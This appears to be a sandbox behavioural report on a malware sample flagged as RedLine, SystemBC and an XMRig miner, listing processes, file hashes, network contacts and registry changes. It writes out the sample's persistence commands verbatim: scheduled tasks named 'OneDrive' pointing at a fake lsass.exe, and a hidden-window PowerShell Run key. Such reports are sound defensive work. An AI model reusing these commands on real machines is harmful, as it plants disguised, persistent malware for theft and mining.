taskeng.exe {A021EA1B-9DC0-4D0C-88A2-BE6616EA8888} S-1-5-21-3948302646-268491222-1934009652-1000:KXZDHPUW\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 07:16 /du 23:59 /sc daily /ri 1 /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 844

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

Network

Country Destination Domain Proto
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 maper.info udp
DE 148.251.234.93:443 maper.info tcp
DE 148.251.234.93:443 maper.info tcp
US 8.8.8.8:53 pool.hashvault.pro udp
US 142.202.242.43:80 pool.hashvault.pro tcp

Files

memory/1380-54-0x00000000013E0000-0x00000000013F8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 69a1e2d4a32861415512e5f95a4a0ac4
SHA1 ba541601b33fa5c7572ba3593e20ad819f2930d2
SHA256 153f22c784edd386ebb5c691e3fd78439860ad6e080c3edd6b17265d045d5382
SHA512 f9c0b107d6646acb17298d1d36708c882003772c9fa478117f5e0bf06945e93f90b4af000508550ec78ec3963ef33910ff5a2c11f8875f2a925880f64cd3e6ba

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LY4EYE6F01FIQ0MOR916.temp

MD5 69a1e2d4a32861415512e5f95a4a0ac4
SHA1 ba541601b33fa5c7572ba3593e20ad819f2930d2
SHA256 153f22c784edd386ebb5c691e3fd78439860ad6e080c3edd6b17265d045d5382
SHA512 f9c0b107d6646acb17298d1d36708c882003772c9fa478117f5e0bf06945e93f90b4af000508550ec78ec3963ef33910ff5a2c11f8875f2a925880f64cd3e6ba

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 69a1e2d4a32861415512e5f95a4a0ac4
SHA1 ba541601b33fa5c7572ba3593e20ad819f2930d2
SHA256 153f22c784edd386ebb5c691e3fd78439860ad6e080c3edd6b17265d045d5382
SHA512 f9c0b107d6646acb17298d1d36708c882003772c9fa478117f5e0bf06945e93f90b4af000508550ec78ec3963ef33910ff5a2c11f8875f2a925880f64cd3e6ba

memory/1636-69-0x000000001B100000-0x000000001B3E2000-memory.dmp

memory/1296-71-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 69a1e2d4a32861415512e5f95a4a0ac4
SHA1 ba541601b33fa5c7572ba3593e20ad819f2930d2
SHA256 153f22c784edd386ebb5c691e3fd78439860ad6e080c3edd6b17265d045d5382
SHA512 f9c0b107d6646acb17298d1d36708c882003772c9fa478117f5e0bf06945e93f90b4af000508550ec78ec3963ef33910ff5a2c11f8875f2a925880f64cd3e6ba

memory/1636-77-0x0000000002510000-0x0000000002590000-memory.dmp

memory/1296-78-0x0000000002930000-0x00000000029B0000-memory.dmp

memory/1848-80-0x00000000028B0000-0x0000000002930000-memory.dmp

memory/1296-82-0x0000000002930000-0x00000000029B0000-memory.dmp

memory/1848-81-0x00000000028B0000-0x0000000002930000-memory.dmp

memory/1636-84-0x0000000002510000-0x0000000002590000-memory.dmp

memory/1848-83-0x00000000028B0000-0x0000000002930000-memory.dmp

memory/916-85-0x00000000020E0000-0x0000000002160000-memory.dmp

memory/1296-79-0x0000000002930000-0x00000000029B0000-memory.dmp

memory/916-86-0x00000000020E0000-0x0000000002160000-memory.dmp

memory/1296-87-0x0000000002930000-0x00000000029B0000-memory.dmp

memory/1636-76-0x0000000002510000-0x0000000002590000-memory.dmp

memory/1636-88-0x0000000002510000-0x0000000002590000-memory.dmp

memory/1848-89-0x00000000028B0000-0x0000000002930000-memory.dmp

memory/916-90-0x00000000020E0000-0x0000000002160000-memory.dmp

memory/1848-91-0x00000000028A0000-0x00000000028AE000-memory.dmp

memory/1848-92-0x0000000002A70000-0x0000000002A80000-memory.dmp

memory/1636-93-0x0000000002510000-0x0000000002590000-memory.dmp

memory/1636-94-0x0000000002510000-0x0000000002590000-memory.dmp

memory/1636-95-0x0000000002510000-0x0000000002590000-memory.dmp

memory/916-96-0x00000000020E0000-0x0000000002160000-memory.dmp

memory/916-97-0x00000000020E0000-0x0000000002160000-memory.dmp

memory/1636-98-0x0000000002510000-0x0000000002590000-memory.dmp

\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 69a1e2d4a32861415512e5f95a4a0ac4
SHA1 ba541601b33fa5c7572ba3593e20ad819f2930d2
SHA256 153f22c784edd386ebb5c691e3fd78439860ad6e080c3edd6b17265d045d5382
SHA512 f9c0b107d6646acb17298d1d36708c882003772c9fa478117f5e0bf06945e93f90b4af000508550ec78ec3963ef33910ff5a2c11f8875f2a925880f64cd3e6ba

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 08e3930a42197a422d064569c4778997
SHA1 74832aa332b48422e5d448f5099b397e84c18712
SHA256 322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512 b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-06 05:11

Reported

2023-05-06 05:13

Platform

win10v2004-20230221-en

Max time kernel

150s

Max time network

152s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

SystemBC

trojan systembc

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Software\Wine C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Roaming\\dllhost.exe'\"" C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3100 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3100 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3100 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3100 wrote to memory of 4228 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3100 wrote to memory of 3096 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3100 wrote to memory of 3096 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3100 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3100 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4228 wrote to memory of 3476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4228 wrote to memory of 3476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4228 wrote to memory of 3476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4228 wrote to memory of 3476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4228 wrote to memory of 3476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4228 wrote to memory of 3476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4228 wrote to memory of 3476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4228 wrote to memory of 3476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4776 wrote to memory of 2032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4776 wrote to memory of 2032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4776 wrote to memory of 2032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4776 wrote to memory of 2032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4776 wrote to memory of 2032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4776 wrote to memory of 2032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4776 wrote to memory of 2032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4776 wrote to memory of 2032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 3096 wrote to memory of 1960 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 3096 wrote to memory of 1960 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 3284 wrote to memory of 2256 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3284 wrote to memory of 2256 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3284 wrote to memory of 216 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3284 wrote to memory of 216 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3284 wrote to memory of 4516 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3284 wrote to memory of 4516 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3284 wrote to memory of 4560 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3284 wrote to memory of 4560 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3096 wrote to memory of 3060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 3096 wrote to memory of 3060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 3096 wrote to memory of 3060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 3096 wrote to memory of 4744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 3096 wrote to memory of 4744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 3096 wrote to memory of 4744 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 2864 wrote to memory of 4828 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2864 wrote to memory of 4828 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2864 wrote to memory of 1832 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2864 wrote to memory of 1832 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2864 wrote to memory of 636 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2864 wrote to memory of 636 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2864 wrote to memory of 1052 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2864 wrote to memory of 1052 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3084 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 3084 wrote to memory of 340 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 4744 wrote to memory of 3508 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
